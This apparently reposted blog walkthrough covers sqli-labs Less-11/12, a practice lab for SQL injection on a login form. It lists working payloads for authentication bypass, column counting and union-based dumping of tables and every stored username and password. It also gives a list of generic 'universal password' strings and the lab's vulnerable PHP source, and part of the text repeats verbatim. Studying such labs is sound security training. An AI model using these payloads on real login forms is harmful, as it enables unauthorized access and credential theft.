Less-11&12
来源:互联网 发布:电熨斗推荐 知乎 编辑:程序博客网 时间:2024/05/22 12:28
select usename,password from table where usename = inputname and password = iputpassword
http://localhost/sqli-labs-master/Less-11/uname=123'&passwd=456&submit=Submit
near ' 456' LIMIT 0,1 ' at line 1
passwd 清空
http://localhost/sqli-labs-master/Less-11/uname=123'&passwd=&submit=Submit
near ' ' 123' ' and password=' ' LIMIT 0,1 ' at line 1
=》select usename,password from table where usename = 'inputname' and password = 'iputpassword'
uname=123' or 1=1#&passwd=&submit=Submit
=》Your Login name:Dumb
Your Password:Dumb
uname=123' or 1=1 limit 1,1#&passwd=&submit=Submit
=》 Your Login name:Angelina
Your Password:I-kill-you
uname=123' or 1=1 order by 4#&passwd=&submit=Submit
=》Unknown column '4' in 'order clause'
....uname=123' or 1=1 order by 2#&passwd=&submit=Submit
=>
Your Login name:admin
Your Password:admin
uname=123' union select version(),database()#&passwd=&submit=Submit
=>
Your Login name:5.5.47
Your Password:security
uname=123' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=&submit=Submit
=>
Your Login name:1
Your Password:emails,referers,uagents,users
uname=123' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=&submit=Submit
=>
Your Login name:1
Your Password:id,username,password
uname=123' union select group_concat(username),group_concat(password) from users#&passwd=&submit=Submit
Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
常用万能密码
or 1=1--
'or 1=1--
"or 1=1--
'or'='or'
http://localhost/sqli-labs-master/Less-11/uname=123'&passwd=456&submit=Submit
near ' 456' LIMIT 0,1 ' at line 1
passwd 清空
http://localhost/sqli-labs-master/Less-11/uname=123'&passwd=&submit=Submit
near ' ' 123' ' and password=' ' LIMIT 0,1 ' at line 1
=》select usename,password from table where usename = 'inputname' and password = 'iputpassword'
uname=123' or 1=1#&passwd=&submit=Submit
=》Your Login name:Dumb
Your Password:Dumb
uname=123' or 1=1 limit 1,1#&passwd=&submit=Submit
=》 Your Login name:Angelina
Your Password:I-kill-you
uname=123' or 1=1 order by 4#&passwd=&submit=Submit
=》Unknown column '4' in 'order clause'
....uname=123' or 1=1 order by 2#&passwd=&submit=Submit
=>
Your Login name:admin
Your Password:admin
uname=123' union select version(),database()#&passwd=&submit=Submit
=>
Your Login name:5.5.47
Your Password:security
uname=123' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=&submit=Submit
=>
Your Login name:1
Your Password:emails,referers,uagents,users
uname=123' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=&submit=Submit
=>
Your Login name:1
Your Password:id,username,password
uname=123' union select group_concat(username),group_concat(password) from users#&passwd=&submit=Submit
Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
常用万能密码
or 1=1--
'or 1=1--
"or 1=1--
'or'='or'
<?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);// take the variablesif(isset($_POST['uname']) && isset($_POST['passwd'])){$uname=$_POST['uname'];$passwd=$_POST['passwd'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'User Name:'.$uname);fwrite($fp,'Password:'.$passwd."\n");fclose($fp);// connectivity @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ //echo '<font color= "#0000ff">'; echo "<br>";echo '<font color= "#FFFF00" font size = 4>';//echo " You Have successfully logged in\n\n " ;echo '<font size="3" color="#0000ff">';echo "<br>";echo 'Your Login name:'. $row['username'];echo "<br>";echo 'Your Password:' .$row['password'];echo "<br>";echo "</font>";echo "<br>";echo "<br>";echo '<img src="../images/flag.jpg" />'; echo "</font>"; }else {echo '<font color= "#0000ff" font size="3">';//echo "Try again looser";print_r(mysql_error());echo "</br>";echo "</br>";echo "</br>";echo '<img src="../images/slap.jpg" />';echo "</font>"; }}?>
0 0
- Less-11&12
- 12、less命令
- less
- less
- LESS
- less
- less
- less
- less
- less
- LESS
- less
- less
- less
- Less
- LESS
- Less
- Less
- 【持续更新】[2017-4-26]红米NOTE3双网全网-信号居左-时间居中-IOS状态栏-集合贴
- Java并发编程实战
- 实现Http Server的三种方法
- Spring dataSource再探
- HDFS简介
- Less-11&12
- D题 走迷宫(dfs+二分枚举)
- Java内存区域划分、内存分配原理
- signal 进程通信
- Modal模态框的防穿透问题,模态框弹出后,禁止body滑动事件
- ArrayList自动扩容解析
- 使用python上传和下载文件到FastDFS
- Qt5.8安装及模块介绍
- 安卓-浅谈个人学习方法(自学篇)